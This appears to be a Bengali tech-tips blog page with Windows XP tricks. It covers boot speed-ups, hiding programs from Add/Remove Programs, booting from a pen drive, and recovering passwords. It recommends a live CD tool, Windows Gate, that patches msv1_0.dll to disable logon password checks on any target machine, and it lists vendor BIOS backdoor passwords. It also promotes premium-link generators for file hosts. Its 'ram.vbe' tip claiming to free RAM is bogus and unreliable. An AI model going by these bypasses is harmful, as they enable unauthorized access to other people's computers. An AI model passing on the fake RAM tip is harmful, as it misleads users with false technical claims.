বিভিন্ন ফাইল শেয়ারিং সাইট থেকে বিনামূল্যে ডাউনলোড করুন প্রিমিয়াম একাউন্ট এর মত। যেমন rapidshare, hotfile , megaupload, uploading, storage ইত্যাদি। আমি এটা টেস্ট করেছি ১০০% কাজ করে। আপনাকে শুধু এই সাইটটি ওপেন করতে হবে এবং সার্ভার অনুযায়ী লিংকে প্রবেশ করে ডাউনলোড লিংকটি পেষ্ট করতে হবে। অতঃপর Generate বাটনে ক্লিক করে নতুন লিংক পাবেন যা থেকে ডাউনলোড করতে পারবেন। এই ধরনের আরেকটা সাইট হল rapidpremium.net। এই সাইটে Username এবং Password হবে public। ভাল লাগলে ধন্যবাদ দিতে ভুলবেন না।

উইন্ডোজ এক্সপির বুট টাইম দ্রুততর করুন

১ম কিস্তি:
=> Notepad –ওপেন করে টাইপ করুন del c:\windows\prefetch\ntosboot-*.* /q
=> C drive-এ ntosboot.bat নামে Save করুন।

২য় কিস্তি:
=> Start মেনু থেকে Run ক্লিক করুন এবং টাইপ করুন gpedit.msc।
=> Shutdown –এ Double ক্লিক করুন।
=> নতুন Window তে add ক্লিক করুন তারপর Browse এ ক্লিক করে ntosboot.bat নামে যে ফাইলটি C ড্রাইভে Save করেছিলেন তা সিলেক্ট করে Open-এ ক্লিক করুন।
=> এবার যথাক্রমে OK , Apply এবং OK করুন এবং Group Policy “Close” করুন।


৩য় কিস্তি:
=> Device manager –এর “IDE ATA/ATAPI controllers”-এ Double ক্লিক করুন।
=> Primary IDE Channel-এ রাইট ক্লিক করে Properties-এ ক্লিক করুন।
=> Advanced Settings ট্যাবের অধীন Device Type0-এ “Autodetect “-এর স্থলে “None” select করে OK করুন।
=> Secondary IDE Channel-এর ক্ষেত্রে Device Type1-এ “Autodetect “-এর স্থলে “None” select করে OK করুন।
=> Device manager টি Close করুন।

সকল কাজ সম্পন্ন হলে pc Restart দিন। দেখুন windows XP দ্রুত Boot হচ্ছে।
*** ৩য় কিস্তি যাদের IDE ATA/ATAPI তাদের জন্য। SATA এর জন্য নয়।

কম্পিউটার কে কিছুটা ফাস্ট করুন

খুব ছোট্ট একটা টিপস আপনাদের সবার জন্য। কোন সফটওয়্যার ছাড়াই আপনি আপনার স্লো কম্পিউটার কে কিছুটা ফাস্ট করতে পারেন। আর আপনার এই কাজটি করতে সময় লাগবে মাত্র ২ মিনিট। এটা মূলত RAM কে টুইক করা। এর মাধ্যমে RAM এ অবস্থানরত ডাটাকে পেজ ফাইলে সরিয়ে দেওয়া হয়। ফলে RAM কিছুটা খালি হয়ে যায় এবং কম্পিউটারের স্পীড কিছুটা বেড়ে যায়। খেয়াল রাখবেন এটা একবার করলে হবে না, যখনই পিসি একটু স্লো মনে হবে তখনই করতে হবে। আসুন দেখি কি ভাবে এটা করা যা‌য়।

১. প্রথমে Notepad চালু করুন।
২. নিচের কোডটি লিখুন।
MYSTRING=(80000000)
৩. এবার File -> Save ক্লিক করুন।
৪. Save as type: এ All Files সিলেক্ট করুন।
৫. File name: এ ram.vbe লিখে ডেস্কটপে সেভ করুন।
৬. ডেস্কটপ থেকে সেভ করা ram ফাইলটিকে ডাবল ক্লিক করুন।
এখন দেখুন আপনার কম্পিউটার অনেক খানি ফাস্ট হয়ে গেছে। আপনার পিসিতে RAM যদি ১২৮মেগাবাইটের কম থাকে তাহলে 80000000 এর পরিবর্তে 160000000 লিখুন।

ইনষ্টল করা প্রোগ্রাম Add or Remove Programs থেকে লুকিয়ে রাখা


কোন প্রোগাম/সফটওয়্যার ইনষ্টল করলে তা কনট্রোল প্যানেলর এ্যাড/রিমুভ প্রোগ্রামে দেখা যায়, যেখান থেকে আনইনষ্টল করা যায়। আর সহজে বোঝা যায় সিস্টেমে কোন কোন প্রোগ্রাম ইনষ্টল করা আছে। কিন্তু আপনি চাইলে এ্যাড রিমুভ প্রোগ্রাম থেকে ইচ্ছামত কিছু প্রোগ্রাম লুকিয়ে ফেলতে পারেন। এজন্য রেজিষ্ট্রি এডিটর (রানে গিয়ে regedit লিখে এন্টার করে) খুলে HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Uninstall এ যান। এবার যে প্রোগ্রামটি লুকিয়ে রাখতে চান সেটি নির্বাচন করে ডানের DisplayName এ দুইবার ক্লিক করে প্রোগ্রামটির নাম (ক্যাপশন) মুছে ফেলুন।

তবে অনেক সময় এখানে কিছু কিছু প্রোগ্রামের নাম দেখা যায় না। তখন উপরের কোড নির্বাচন করে ডানের DisplayName নাম দেখে বুঝে নিন এবং DisplayName এর ক্যাপশন মুছে দিন। তাহলে সেটি আর এ্যাড রিমুভে তা দেখা যাবে না। আপনি চাইলে DisplayName এর ক্যাপশন মুছে অন্য নাম লিখে দিলে এ্যাড রিমুভে নতুন নাম দেখাবে।

ইনষ্টল করা প্রোগ্রাম Add or Remove Programs থেকে লুকিয়ে রাখা

কোন প্রোগাম/সফটওয়্যার ইনষ্টল করলে তা কনট্রোল প্যানেলর এ্যাড/রিমুভ প্রোগ্রামে দেখা যায়, যেখান থেকে আনইনষ্টল করা যায়। আর সহজে বোঝা যায় সিস্টেমে কোন কোন প্রোগ্রাম ইনষ্টল করা আছে। কিন্তু আপনি চাইলে এ্যাড রিমুভ প্রোগ্রাম থেকে ইচ্ছামত কিছু প্রোগ্রাম লুকিয়ে ফেলতে পারেন। এজন্য রেজিষ্ট্রি এডিটর (রানে গিয়ে regedit লিখে এন্টার করে) খুলে HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Uninstall এ যান। এবার যে প্রোগ্রামটি লুকিয়ে রাখতে চান সেটি নির্বাচন করে ডানের DisplayName এ দুইবার ক্লিক করে প্রোগ্রামটির নাম (ক্যাপশন) মুছে ফেলুন।

তবে অনেক সময় এখানে কিছু কিছু প্রোগ্রামের নাম দেখা যায় না। তখন উপরের কোড নির্বাচন করে ডানের DisplayName নাম দেখে বুঝে নিন এবং DisplayName এর ক্যাপশন মুছে দিন। তাহলে সেটি আর এ্যাড রিমুভে তা দেখা যাবে না। আপনি চাইলে DisplayName এর ক্যাপশন মুছে অন্য নাম লিখে দিলে এ্যাড রিমুভে নতুন নাম দেখাবে।

উইন্ডোজ ইনস্টলের পর ও অপরিবতির্ত রাখুন আপনার পিসির সব সেটিংস

আমরা যখন অপারেটিং সিস্টেম নতুন ভাবে ইনস্টল করি, তখন আমাদের পিসিতে আগের সব সেটিংস(Desktop and display settings, dialup connection, settings for IE) বতর্মান থাকে না। সবকিছু আবার নতুন ভাবে করতে হয়। কিন্তু উইন্ডোজ XP তে Files and Settings Transfer Wizard এর মাধ্যমে আপনি আপনার পুরাতন পিসির সব সেটিংস নতুন পিসিতে(নতুন ওএস যেটিতে দেওয়া হয়েছে)স্হানান্তর করতে পারেন। নতুন পিসিতে আলাদাভাবে কোন সেটিংস করার প্রয়োজন হবে না। এই Wizard টি আপনি পাবেন Start Menu -> All programs -> Accessories -> System tools এর অধীনে।

Wizard টি চালু হলে প্রথমে Next বাটনে ক্লিক করুন। এখানে আপনি দুইটি অপশন পাবেন। দ্বিতীয় অপশনটি(Old computer) সিলেক্ট করে Next বাটনে ক্লিক করুন। এখানে আপনি চারটি অপশন পাবেন। চার নাম্বার অপশনটি সিলেক্ট করুন এবং ব্রাউজ বাটনে ক্লিক করে আপনার ডিস্ক ড্রাইভে একটি লোকেশন দেখিয়ে দিন যেখানে আপনার সেটিংস ফাইল আকারে সেভ হবে। পুনরায় Next বাটনে ক্লিক করে আপনার প্রয়োজন অনুযায়ী যে কোন একটি অপশন সিলেক্ট করুন। সবশেষে Finish বাটনে ক্লিক করুন।
এখন ধরে নিলাম আপনি ওএস নতুনভাবে ইনস্টল করেছেন। এবার পুনরায় Wizard টি চালু করুন এবং প্রথম অপশনটি(New computer) সিলেক্ট করুন। Next বাটনে ক্লিক করলে আগের মত চারটি অপশন পাবেন। পুনরায় চার নাম্বার অপশনটি সিলেক্ট করুন এবং ব্রাউজ বাটনে ক্লিক করে আপনার ডিস্ক ড্রাইভে লোকেশনটি দেখিয়ে দিন যেখানে আপনার সেটিংস ফাইলটি সেভ করা হয়েছিল। এবার Next বাটনে ক্লিক করলে আপনার আগের সেটিংসগুলো অ্যাপ্লাই হবে।

পেন ড্রাইভ থেকে বুট করুন যে কোন কম্পিউটার!!!


আগে মানুষ বিভিন্ন প্রয়োজনে ফ্লপি অথবা সিডি থেকে পিসি বুট করত। বর্তমানে ফ্লপিকে বিলু্প্তির পথে ধরে নেওয়া যায়। আর ফ্লপির স্থান দখল করে নিয়েছে পেনড্রাইভ। ফলে বর্তমানে যেসব মাদারবোর্ড বের হচ্ছে তার সবগুলোতেই ইউএসবি থেকে বুট করার অপশন থাকে। ইদানিং সব ধরনের অপারেটিং সিস্টেমের ইউএসবি ভার্শন পাওয়া যায় যা হার্ডডিস্কের পরিবর্তে সরাসরি ইউএসবি পেন ড্রাইব থেকে বুট হয়। যাদের মাদারবোর্ডে ইউএসবি বুট সুবিধা আছে তারা পেন ড্রাইভ থেকে অপারেটিং সিস্টেম বুট করা সহ সব ধরনের বুট করতে পারেন। যারা একটু পুরনো পিসি ব্যবহার করেন তাদের আফসোস আর দীর্ঘশ্বাস ফেলা আর কিছুই করার থাকে না। ফলে অনেকেই পুরোনো পিসি বিক্রি করে নতুন পিসি কিনছেন। আপনার আফসোসের দিন শেষ! মাদারবোর্ডে ইউএসবি বুট অপশন না থাকলেও পেন ড্রাইভ থেকে পিসি বুট করতে পারবেন!!! কিভাবে? একটা ছোট ইউটিলিটি সফটওয়্যার আপনাকে এই ব্যবস্থা করে দেবে।

সফটওয়্যারটির নাম হল PLoP Boot Manager। এই বুট ম্যানেজারটি আপনি ফ্লপি, সিডিরম অথবা সরাসরি হার্ডডিস্ক থেকে চালু করতে পারবেন। হার্ডডিস্কে ইনস্টল করার জন্য আলাদা পার্টিশন করার দরকার নেই, C: ড্রাইভেই ইনস্টল হবে। PLoP Boot Manager এর বিস্তারিত জানতে এবং ডাউনলোডের জন্য এই লিংকে ক্লিক করুন।

XP পাসওয়ার্ড ভুলে গেলে কি করবেন

আমরা সাধারনত কম্পিউটারে কোন তথ্য বা কম্পিউটারকে সেভ রাখার জন্য পাসওয়ার্ড দিয়ে লক করে রাখি। কিন্তু কোন কারনে পাসওয়ার্ড ভুলে গেলে কি করবেন? তখন অনেকেই নতুন করে এক্সপি সেটাপ দেন। কিন্তু আমি এখন যে টিপসটি দেব তা আপনার ভাগ্য ভাল হলে কাজে লেগেও যেতে পারে। ব্যাপারটা একটু খুলে বলি, এক্সপি সেটাপ দেওয়ার সময় এডমিনিস্ট্রেটররের পাসওয়ার্ড দেওয়ার একটা অপশন আসে যা আমরা বেশিভাগই খালি রেখে পরের ধাপে চলে যাই(যদি ও আপনারার পিসির নিরপত্তার স্বার্থে এটা করা উচিৎ না)। ফলে Administrator এর কোন পাসওয়ার্ড থাকে না। লগিন স্ক্রিনে আপনার দেওয়া পাসওয়ার্ড দিয়ে যদি ঢোকা না যায় তাহলে কম্পিউটারে কিবোর্ডে Ctrl+alt+del দুইবার চাপুন। তাহলে দেখবেন উইন্ডোজ ২০০০ এর মত লগিন স্ক্রিন দেখাচ্ছে।

এবার Username এ administrator লিখে এন্টার চাপুন। যেহেতু কোন পাসওয়ার্ড নেই(থাকলে কিন্তু আপনি ধরা :)) কম্পিউটার লগিন হয়ে যাবে। এবার My Computer রাইট মাউস ক্লিক করে Manage এ ক্লিক করুন। Computer Management চালু হবে। System Tools -> Local Users and Group -> Users এ ক্লিক করে ডান পাশ থেকে যে ইউজারের পাসওয়ার্ড ভুলে গেছেন সেটাতে রাইট মাউস ক্লিক করে Set Password... এ ক্লিক করুন। Proceed ক্লিক করুন। নতুন পাসওয়ার্ড দিয়ে OK করুন। এবার লগঅফ করে আপনার পূর্বের ইউজার দিয়ে লগিন করুন।

এডমিন/ইউজার পাসওয়ার্ড খোলার উপায়


Windows এর এডমিন / ইউজার পাসওয়ার্ড ক্র্যাক/ ভাঙ্গার কাজ windows Gate ব্যবহার করে খুব সহজেই করা যায়। আসুন দেখে নেওয়া যাক এর জন কি কি প্রয়োজন হবে।
১। এক্স. পি এর লাইভ ডিস্ক সাথে windows Gate সফটওয়্যার।
২। সিডি রম ড্রাইভ ( এটি সব কম্পিউটারের একটি করে থাকে, লাইভ এক্স .পি এর ইউ. এস বি, ভার্শন এখনো করতে পারি নাই)
৩। কম পক্ষে ১২৮ এম বি মেমোরী।
এটি নিম্নের তালিকায় দেওয়া Windows এর ভার্সনে কাজ করবে।

১. Windows Server 2008
২. Windows Vista
৩. Windows Server 2003
৪. Windows XP
৫. Windows 2000

( ৩২ / ৬৪ বিট )উভয় প্রকারের জন্য কার্যকর।

শুরু করি:
নিচের লিংক হতে এক্স পি এর লাইভ ভার্সন ডাউনলো করে নিন। এবং আপজিপ করে এর I.S.O ফাইলটা নিরো বা এই জাতীয় কোন সিডি বার্নার সফট দিয়ে তা সিডিতে রাইট করে নিন।
পার্ট-১ ১০ এম. বি
পার্ট-২ ১০ এম. বি
পার্ট-৩ ৯ এম. বি

এবার আপনি যে কম্পিউটারে এডমিন/ ইউজার পাসওয়ার্ড খোলতে চান সেটি চালু করুন এবং সেটির বায়োস প্রবেশ করে বুট সিকোয়েন্স এর ফাস্ট ডিভাইস হিসেবে সিডি/ ডিভিডি রম নির্ধারন করুন। সেটিং সেইভ করুন এবং এক্স. পি এর লাইভ ডিস্ক প্র্রবেশ করিয়ে কম্পিউটার বুট করুন। এই অবস্থায় সি ডি হতে বুট করার জন্য কী বোর্ড হতে যে কোন একটি কী প্র্রেস করুন ( প্রেস করার ম্যাসেজ আসলে)। এবার windows সরাসরি সিডি হতে লোড হবে, কিছুক্ষণ অপেক্ষা করুন, লোড হওয়া পর্যন্ত। এখন, Start -> Programs -> Unlockers -> Windows Gate এ ক্লিক করুন। C:[]-windowsXp[5.1.2600.2180(xpsp_sp2_rtm.040803-2158)] লাইনটি সিলেক্ট করুন। অতপর Available gates অপশন হতে Msv1_0.dll.patch (check to disable logon password validation) চেক বক্স এ টিক মার্কস দিন। close (X) বাটনে ক্লিক করুন। কম্পিউটার রিস্টাট করে লাইভ ডিস্ক বের করুন। এবার নরমালি হার্ডডিস্ক হতে বুট করুন এবং লগইন স্ক্রীনে পাসওয়ার্ড টেক্স এ কোন কিছু টাইপ না করে শুধু মাত্র এন্টার প্রেস করুন।বি: দ্র: ডাউন লোড এর সুবিধার জন্য আমি এটার অন্যান্য ইউটিলিটি গুলো বাদ দিয়ে শুধু মাত্র্র windows Gate সফটওয়্যারটি যুক্ত করে দিয়েছি।

Google থেকে জেনে নিন যেকোন শব্দের সংজ্ঞা -

গুগলের Define অপারেটরটি ব্যবহার করে আপনি কোন সাইটে প্রবেশ না করে শুধুমাত্র সার্চ রেজাল্ট থেকেই যেকোন শব্দের সংজ্ঞা জেনে নিতে পারবেন। গুগল বিভিন্ন সাইট ঘেঁটে নিজেই আপনার জন্য আপনার প্রদত্ত শব্দটির বিভিন্ন সংজ্ঞা এনে হাজির করবে। যেমন ধরুন আপনি যদি জানতে চান mouse শব্দটির সংজ্ঞা কি, তাহলে গুগল সার্চে গিয়ে define:mouse লিখে সার্চ দিলেই দেখবেন মাউজের বিভিন্ন সংজ্ঞা এসে হাজির হয়ে গেছে। এখানে আমি define:mouse থেকে প্রাপ্ত সংজ্ঞাগুলো থেকে দুটি সংজ্ঞা উল্লেখ করলাম -


1. A hand-operated electronic device that controls the coordinates of a cursor on your computer screen as you move it around on a pad …

2. A mouse (plural mice) is a small animal that belongs to one of numerous species of rodents …

দেখতেই পাচ্ছেন গুগল একজন সংজ্ঞা বিশারদও বটে।

BIOS Password ভুলে গেলে আপনার করণীয়


বায়োস পাসওয়ার্ডের মাধ্যমে আমরা কম্পিউটারকে অনাক্ষাংখীত ব্যবহার থেকে রক্ষা করতে পারি। বায়োসে দুই ধরনের পাসওয়ার্ড সেট করা যায়। এক ধরনের পাসওয়ার্ড হল পাওয়ার অন করার পর পাসওয়ার্ড চাইবে, সঠিক পাসওয়ার্ড দিতে ব্যার্থ হলে কম্পিউটার চালু হবে না। এবং অন্য ধরনের পাসওয়ার্ড হল কম্পিউটার অন হবে কিন্তু বায়োস সেটিংসে ঢুকতে গেলে পাসওয়ার্ড চাইবে। অনেক সময় দেখা যায়, ব্যবহারকারী বায়োস পাসওয়ার্ড ভুলে গেছেন তাই কম্পিউটার অন করতে পারছেন না। অথবা কারো কাছ থেকে ব্যবহৃত কম্পিউটার কিনেছেন বায়োস সেটিংসে ঢুকতে গিয়ে দেখলেন পাসওয়ার্ড চাইছে। এই ধরনের সমস্যার ক্ষেত্রে বায়োস পাসওয়ার্ড বাইপাস বা রিসেট করার প্রয়োজন হয়। নিচের তিন পদ্ধতিতে আপনি এই কাজটি করতে পারেন।

১. বায়োস ব্যাটারী খুলে:
মাদারবোর্ডে একটু খেয়াল করলেই দেখতে পাবেন একটা চ্যাপ্টা ব্যাটারী লাগানো আছে। এই ধরনের ব্যাটারী হাতঘড়িতে ও ব্যবহার করা হয়। সাবধানে ব্যাটারীটি খুলে ফেলুন(অবশ্যই কম্পিউটার বন্ধ অবস্থায়)। ১০ থেকে ১৫ সেকেন্ড পর ব্যাটারীটি লাগিয়ে কম্পিউটার চালু করুন। পাসওয়ার্ড মুছে যাওয়ার কথা। তবে কিছু মাদারবোর্ডে ক্যাপাসিটর ব্যবহার করা হয় পাওয়ার ব্যাকআপ রাখার জন্য। এই ধরনের মাদারবোর্ডে ১০/১৫ সেকেন্ডে কাজ হবে না। অন্তত ২৪ ঘন্টার জন্য ব্যাটারীটি খুলে রাখুন। পাসওয়ার্ড মুছে যাবে। কিছু কিছু মাদারবোর্ডে ব্যাটারীটি সোল্ডার করা থাকে। এক্ষেত্রে সোল্ডারিংয়ের অভীজ্ঞতা না থাকলে অভীজ্ঞ কাউকে দিয়ে ব্যাটারীটি খুলিয়ে নিন। শেষ কথা হল, আধুনিক কিছু কিছু মাদারবোর্ডে বিশেষ করে ল্যাপটপের মাদারবোর্ডের ব্যাটারী খুলে কাজ হয় না। এই ধরনের মাদারবোর্ডের ক্ষেত্রে পরবর্তী পদ্ধতিগুলো চেষ্টা করুন।


২. জাম্পার অথবা DIP সুইচ এর মাধ্যমে:
অনেক মাদারবোর্ডে জাম্পার অথবা ডিপ সুইচের মাধ্যমে পাসওয়ার্ড রিসেট করার ব্যবস্থা থাকে। এক্ষেত্রে জাম্পার বা ডিপ সুইচের পাশে লেখা থাকে কোন ধরনের সেটিংস দিতে হবে। মাদারবোর্ডে লেখা না থাকলে মাদারবোর্ডের সাথে দেওয়া ম্যানুয়াল পড়ে অথবা মাদারবোর্ড প্রস্তুতকারী কোম্পানীর ওয়েবসাইট থেকে ও জেনে নিতে পারেন।৩. গোপন পাসওয়ার্ডের মাধ্যমে:
অনেক বায়োস প্রস্তুতকারী কোম্পানী তাদের বায়োসে কিছু গোপন পাসওয়ার্ড দিয়ে রাখে। এই পাসওয়ার্ড দিয়ে অন্য পাসওয়ার্ডগুলোকে বাইপাস করে চলে যাওয়া যায়। নিচে এধরনের একটা তালিকা দেওয়া হল।

Award BIOS এর জন্য:
ALFAROME, BIOSTAR, KDD, ZAAADA, ALLy, CONCAT, Lkwpeter, ZBAAACA, aLLy, CONDO, LKWPETER, ZJAAADC, aLLY, Condo, PINT, 01322222, ALLY, d8on, pint, 589589, aPAf, djonet, SER, 589721, _award, HLT, SKY_FOX, 595595, AWARD_SW, J64, SYXZ, 598598, AWARD?SW, J256, syxz, AWARD SW, J262, shift + syxz, AWARD PW, j332, TTPTHA, AWKWARD, j322, awkward ইত্যাদি।

AMI BIOS এর জন্য:
AMI, BIOS, PASSWORD, HEWITT RAND, AMI?SW, AMI_SW, LKWPETER, CONDO ইত্যাদি।

Phoenix BIOS এর জন্য:
phoenix, PHOENIX, CMOS, BIOS ইত্যাদি।

কিছু কমন পাসওয়ার্ড:
ALFAROME, BIOSTAR, biostar, biosstar, CMOS, cmos, LKWPETER, lkwpeter, setup, SETUP, Syxz, Wodj ইত্যাদি।

অন্যান্য কোম্পানীর BIOS Password:

কোম্পানী = = পাসওয়ার্ড
VOBIS & IBM = = merlin
Dell = = Dell
Biostar = = Biostar
Compaq = = Compaq
Enox = = xo11nE
Epox = = central
Freetech = = Posterie
IWill = = iwill
Jetway = = spooml
Packard Bell = = bell9
QDI = = QDI
Siemens = = SKY_FOX
TMC = = BIGO
Toshiba = = Toshiba
Toshiba = = BIOS

বেশিরভাগ Toshiba Laptop এবং কিছু Desktop এ বুট হওয়ার সময় কিবোর্ডের বাম পাশের Shift কী চেপে ধরে রাখলে ও বায়োস পাসওয়ার্ড বাইপাস করা যায়।

পিসি বুট হবার সময় খুব দ্রুত মাউসের বাটন দুটি চাপতে থাকলে IBM Aptiva BIOS এর পাসওয়ার্ড বাইপাস করা যায়।

জনপ্রিয় পোস্টসমূহ

ক্রিকেট ঝলক

ফেসবুক ব্যাজ

Top